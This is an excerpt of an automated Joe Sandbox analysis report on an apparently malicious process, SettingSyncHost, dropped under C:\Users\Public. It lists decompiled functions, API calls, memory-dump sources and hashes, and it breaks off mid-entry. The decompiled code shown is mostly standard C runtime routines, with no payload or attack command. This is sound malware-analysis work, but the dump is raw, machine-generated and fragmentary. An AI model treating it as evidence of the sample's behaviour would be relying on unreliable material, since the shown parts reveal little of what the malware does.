                                                                                                                                      0x003997d9
                                                                                                                                      0x003997e0
                                                                                                                                      0x003997e9
                                                                                                                                      0x003997ef
                                                                                                                                      0x003997f6
                                                                                                                                      0x003997fc
                                                                                                                                      0x00399803
                                                                                                                                      0x0039980a
                                                                                                                                      0x00399810
                                                                                                                                      0x00399813
                                                                                                                                      0x00399816
                                                                                                                                      0x0039981b
                                                                                                                                      0x0039981d
                                                                                                                                      0x00399822
                                                                                                                                      0x00399822
                                                                                                                                      0x00399828
                                                                                                                                      0x0039982e
                                                                                                                                      0x0039983f

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,003C5E78,00000008,003998AC,00000000,00000000), ref: 003997B5
                                                                                                                                      • __lock.LIBCMT ref: 003997E9
                                                                                                                                        • Part of subcall function 00399DC7: __mtinitlocknum.LIBCMT ref: 00399DDD
                                                                                                                                        • Part of subcall function 00399DC7: __amsg_exit.LIBCMT ref: 00399DE9
                                                                                                                                        • Part of subcall function 00399DC7: EnterCriticalSection.KERNEL32(00000001,00000001,?,003997EE,0000000D), ref: 00399DF1
                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 003997F6
                                                                                                                                      • __lock.LIBCMT ref: 0039980A
                                                                                                                                      • ___addlocaleref.LIBCMT ref: 00399828
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                      • String ID: KERNEL32.DLL
                                                                                                                                      • API String ID: 637971194-2576044830
                                                                                                                                      • Opcode ID: cedfd00c99e2c923356924302a6c6a94fedfcce3e97d27ea88882f1b7286b60c
                                                                                                                                      • Instruction ID: 65d05c9c23fdb845898a7607fcc6c34cbfd2602489eac3a9913c09c2f4f16e9c
                                                                                                                                      • Opcode Fuzzy Hash: cedfd00c99e2c923356924302a6c6a94fedfcce3e97d27ea88882f1b7286b60c
                                                                                                                                      • Instruction Fuzzy Hash: 3F019275544B44DFDB22AF69D806B49FBF0AF40320F10890EE4D59B2A1CBB4AA44CF55
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E7BB5, Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetConsoleOutputCP.KERNEL32(?,003E0BCA,900C408B), ref: 003E7BFD
                                                                                                                                      • __fassign.LIBCMT ref: 003E7DE2
                                                                                                                                      • __fassign.LIBCMT ref: 003E7DFF
                                                                                                                                      • WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003E7E47
                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 003E7E87
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 003E7F2F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1735259414-0
                                                                                                                                      • Opcode ID: 193e9d7d4047612391a89ac5d95227c94936e2ae33587c7b079ef41585f92453
                                                                                                                                      • Instruction ID: f1e59c6fa2b8fce35ffa5cc48fcf05db6bd8c0675e838cb5eec4c10f89deec08
                                                                                                                                      • Opcode Fuzzy Hash: 193e9d7d4047612391a89ac5d95227c94936e2ae33587c7b079ef41585f92453
                                                                                                                                      • Instruction Fuzzy Hash: 1FC19371D052989FCF16CFA9C9809EDBBB5EF48314F28426AE455BB381D731AD42CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D0030, Relevance: 9.1, APIs: 6, Instructions: 123COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D0079
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D009B
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D00BB
                                                                                                                                      • __Getctype.LIBCPMT ref: 003D0151
                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 003D0170
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D0188
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1102183713-0
                                                                                                                                      • Opcode ID: 3ed7ae4de608b44c798ab5ab97370aebae07a5355498f46855bbc4364f74bb76
                                                                                                                                      • Instruction ID: f76b67379f17e453ab25a6ba698e9b90fb2b00aae32f97615d7a6e6a84886579
                                                                                                                                      • Opcode Fuzzy Hash: 3ed7ae4de608b44c798ab5ab97370aebae07a5355498f46855bbc4364f74bb76
                                                                                                                                      • Instruction Fuzzy Hash: 3A41A172D00208DFCB26DF64E941BAEB7B4EB04B10F15816EE845AB391DB35AD45CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D6AC0, Relevance: 9.1, APIs: 6, Instructions: 63COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __Xtime_get_ticks.LIBCPMT ref: 003D6AF3
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6B01
                                                                                                                                      • __Xtime_get_ticks.LIBCPMT ref: 003D6B1B
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6B29
                                                                                                                                      • __Xtime_get_ticks.LIBCPMT ref: 003D6B4B
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6B59
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Unothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3390117325-0
                                                                                                                                      • Opcode ID: e95c36ee78adec189bae9d55b262364bdd649e1d0eb0ec3d7778c4f99592bbaa
                                                                                                                                      • Instruction ID: 0ba99690cd8e21c7944d18f97c4acb88e8392338412902ab5b27e01935ae9896
                                                                                                                                      • Opcode Fuzzy Hash: e95c36ee78adec189bae9d55b262364bdd649e1d0eb0ec3d7778c4f99592bbaa
                                                                                                                                      • Instruction Fuzzy Hash: 0B11A571504B40AFDB21DF75D986B26B7E4BF40710F54851FE4968BA91C7B0F880CB55
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003DCD43, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,003DCD3A,003DB33A,003D9B0A), ref: 003DCD51
                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003DCD5F
                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003DCD78
                                                                                                                                      • SetLastError.KERNEL32(00000000,003DCD3A,003DB33A,003D9B0A), ref: 003DCDCA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                      • Opcode ID: 7022f4d17eb37ddda9b71f1fb2af0fc0757a2cfa16b13150db63c9a1294b0197
                                                                                                                                      • Instruction ID: 4336e07b0c89aa843d339d2910f651a9b6bc8842dae3010f3d9a0fb6d912322c
                                                                                                                                      • Opcode Fuzzy Hash: 7022f4d17eb37ddda9b71f1fb2af0fc0757a2cfa16b13150db63c9a1294b0197
                                                                                                                                      • Instruction Fuzzy Hash: 10019EB322A6226EE6272B74BD854662E59EB05370721023BF110A83F0EF614C11D249
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0039A057, Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                      			E0039A057(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x3c5ee8);
				E0039A560(__ebx, __edi, __esi);
				_t31 = E003998D1(__ebx, __edx, _t35);
				_t15 =  *0x3c72f4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00399DC7(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x3c7a28; // 0x3c7600
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x3c7600;
								if(__eflags != 0) {
									E00399DFA(_t33);
								}
							}
						}
						_t21 =  *0x3c7a28; // 0x3c7600
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x3c7a28; // 0x3c7600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0039A0F2();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E003A235F(_t29, _t38, 0x20);
				}
				return E0039A5A5(_t33);
			}









                                                                                                                                      0x0039a057
                                                                                                                                      0x0039a057
                                                                                                                                      0x0039a057
                                                                                                                                      0x0039a057
                                                                                                                                      0x0039a059
                                                                                                                                      0x0039a05e
                                                                                                                                      0x0039a068
                                                                                                                                      0x0039a06a
                                                                                                                                      0x0039a072
                                                                                                                                      0x0039a093
                                                                                                                                      0x0039a099
                                                                                                                                      0x0039a09d
                                                                                                                                      0x0039a0a0
                                                                                                                                      0x0039a0a3
                                                                                                                                      0x0039a0a9
                                                                                                                                      0x0039a0ab
                                                                                                                                      0x0039a0ad
                                                                                                                                      0x0039a0b6
                                                                                                                                      0x0039a0b8
                                                                                                                                      0x0039a0ba
                                                                                                                                      0x0039a0c0
                                                                                                                                      0x0039a0c3
                                                                                                                                      0x0039a0c8
                                                                                                                                      0x0039a0c0
                                                                                                                                      0x0039a0b8
                                                                                                                                      0x0039a0c9
                                                                                                                                      0x0039a0ce
                                                                                                                                      0x0039a0d1
                                                                                                                                      0x0039a0d7
                                                                                                                                      0x0039a0db
                                                                                                                                      0x0039a0db
                                                                                                                                      0x0039a0e1
                                                                                                                                      0x0039a0e8
                                                                                                                                      0x0039a07a
                                                                                                                                      0x0039a07a
                                                                                                                                      0x0039a07a
                                                                                                                                      0x0039a07d
                                                                                                                                      0x0039a07f
                                                                                                                                      0x0039a083
                                                                                                                                      0x0039a088
                                                                                                                                      0x0039a090

                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 0039A063
                                                                                                                                        • Part of subcall function 003998D1: __getptd_noexit.LIBCMT ref: 003998D4
                                                                                                                                        • Part of subcall function 003998D1: __amsg_exit.LIBCMT ref: 003998E1
                                                                                                                                      • __amsg_exit.LIBCMT ref: 0039A083
                                                                                                                                      • __lock.LIBCMT ref: 0039A093
                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 0039A0B0
                                                                                                                                      • _free.LIBCMT ref: 0039A0C3
                                                                                                                                      • InterlockedIncrement.KERNEL32(003C7600), ref: 0039A0DB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3470314060-0
                                                                                                                                      • Opcode ID: 7aeb5c5db5c8b62b9e52ccd1b596d12f49c3675f0d63588a610d395465c1bc60
                                                                                                                                      • Instruction ID: 88456f1a6724a6876c4df40d72434a037eec2808d307eee37f5b4e0e46ebbd28
                                                                                                                                      • Opcode Fuzzy Hash: 7aeb5c5db5c8b62b9e52ccd1b596d12f49c3675f0d63588a610d395465c1bc60
                                                                                                                                      • Instruction Fuzzy Hash: BA01D236A04E219BDF23AB298805B5D73A4BF05720F020209F804AB391C734BD91CFD6
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00393DD7, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                      			E00393DD7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t35;
				intOrPtr* _t37;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_t33 = __edx;
				_t27 = __ebx;
				_push(0xc);
				_push(0x3c5d58);
				E0039A560(__ebx, __edi, __esi);
				_t35 = E003998D1(__ebx, __edx, _t39);
				_t37 = E0039A7FF(8, 1);
				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
				_t40 = _t37;
				if(_t37 != 0) {
					E00399554(_t27, __edx, _t35, _t37, __eflags);
					E0039A057(_t27, _t33, _t35, _t37, __eflags);
					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
					 *(_t37 + 4) =  *(_t35 + 0x68);
					E00399DC7(_t27, _t35, 0xc);
					_t5 = _t38 - 4;
					 *_t5 =  *(_t38 - 4) & 0x00000000;
					__eflags =  *_t5;
					E00399294( *_t37);
					 *(_t38 - 4) = 0xfffffffe;
					E00393E71();
					E00399DC7(_t27, _t35, 0xd);
					 *(_t38 - 4) = 1;
					InterlockedIncrement( *(_t37 + 4));
					 *(_t38 - 4) = 0xfffffffe;
					E00393E7D();
					_t24 = _t37;
				} else {
					 *((intOrPtr*)(E0039960F(_t40))) = 0xc;
					_t24 = 0;
				}
				return E0039A5A5(_t24);
			}








                                                                                                                                      0x00393dd7
                                                                                                                                      0x00393dd7
                                                                                                                                      0x00393dd7
                                                                                                                                      0x00393dd7
                                                                                                                                      0x00393dd9
                                                                                                                                      0x00393dde
                                                                                                                                      0x00393de8
                                                                                                                                      0x00393df5
                                                                                                                                      0x00393df7
                                                                                                                                      0x00393dfa
                                                                                                                                      0x00393dfc
                                                                                                                                      0x00393e0d
                                                                                                                                      0x00393e12
                                                                                                                                      0x00393e1a
                                                                                                                                      0x00393e1f
                                                                                                                                      0x00393e24
                                                                                                                                      0x00393e2a
                                                                                                                                      0x00393e2a
                                                                                                                                      0x00393e2a
                                                                                                                                      0x00393e30
                                                                                                                                      0x00393e36
                                                                                                                                      0x00393e3d
                                                                                                                                      0x00393e44
                                                                                                                                      0x00393e4a
                                                                                                                                      0x00393e54
                                                                                                                                      0x00393e5a
                                                                                                                                      0x00393e61
                                                                                                                                      0x00393e66
                                                                                                                                      0x00393dfe
                                                                                                                                      0x00393e03
                                                                                                                                      0x00393e09
                                                                                                                                      0x00393e09
                                                                                                                                      0x00393e6d

                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 00393DE3
                                                                                                                                        • Part of subcall function 003998D1: __getptd_noexit.LIBCMT ref: 003998D4
                                                                                                                                        • Part of subcall function 003998D1: __amsg_exit.LIBCMT ref: 003998E1
                                                                                                                                      • __calloc_crt.LIBCMT ref: 00393DEE
                                                                                                                                        • Part of subcall function 0039A7FF: Sleep.KERNEL32(00000000), ref: 0039A827
                                                                                                                                      • __lock.LIBCMT ref: 00393E24
                                                                                                                                      • ___addlocaleref.LIBCMT ref: 00393E30
                                                                                                                                      • __lock.LIBCMT ref: 00393E44
                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 00393E54
                                                                                                                                        • Part of subcall function 0039960F: __getptd_noexit.LIBCMT ref: 0039960F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3803058747-0
                                                                                                                                      • Opcode ID: f1178753f7bb2a67e5d9023343f3a1cc3e5ed167561f9280c7ad51b21a21db11
                                                                                                                                      • Instruction ID: d62f4a13d4d9a71faaee65b6503eb5aed862908addb4934bf72f9d07b370bec8
                                                                                                                                      • Opcode Fuzzy Hash: f1178753f7bb2a67e5d9023343f3a1cc3e5ed167561f9280c7ad51b21a21db11
                                                                                                                                      • Instruction Fuzzy Hash: 210171B2900705AAEF12BFBC8846B5D77A0AF44720F21460DF4559E2D2DB7459409B52
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EABEA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • C:\Users\Public\SettingSyncHost, xrefs: 003EABEF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: C:\Users\Public\SettingSyncHost
                                                                                                                                      • API String ID: 0-2131873982
                                                                                                                                      • Opcode ID: 018df67a0ced686ebdbb9e491c1b92b9e0f4a918e96eb79327f08f90fbf55cc3
                                                                                                                                      • Instruction ID: 047f95076e829fd4fa06b33fef6abb204a38f7b7b9b6b52e5f9026555b70e829
                                                                                                                                      • Opcode Fuzzy Hash: 018df67a0ced686ebdbb9e491c1b92b9e0f4a918e96eb79327f08f90fbf55cc3
                                                                                                                                      • Instruction Fuzzy Hash: 5921CF71604AA9AFDB23AF63CC8093B776CAF403647224714F916DB1C1E731EC1186A1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003DDDE2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,003DDEA3,?,?,0040A300,00000000,?,003DDFCE,00000004,InitializeCriticalSectionEx,003FA8FC,003FA904,00000000), ref: 003DDE72
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                      • String ID: api-ms-
                                                                                                                                      • API String ID: 3664257935-2084034818
                                                                                                                                      • Opcode ID: 1ee6f5d9eec599cb5ea83b0b1ade5f396fe4352cf095d26e4cb0983dc510d62d
                                                                                                                                      • Instruction ID: 32ff907d34bebb59bf4e8ccc4523f75f45b9689015b3dda252ad04d596dc4d3e
                                                                                                                                      • Opcode Fuzzy Hash: 1ee6f5d9eec599cb5ea83b0b1ade5f396fe4352cf095d26e4cb0983dc510d62d
                                                                                                                                      • Instruction Fuzzy Hash: AC11A333A01625ABCF234B68AC4476A77989F21BA0F160222E914EF380D770ED00C6D5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E109C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,003E1091,?,?,003E1059,?,?,?), ref: 003E10B1
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003E10C4
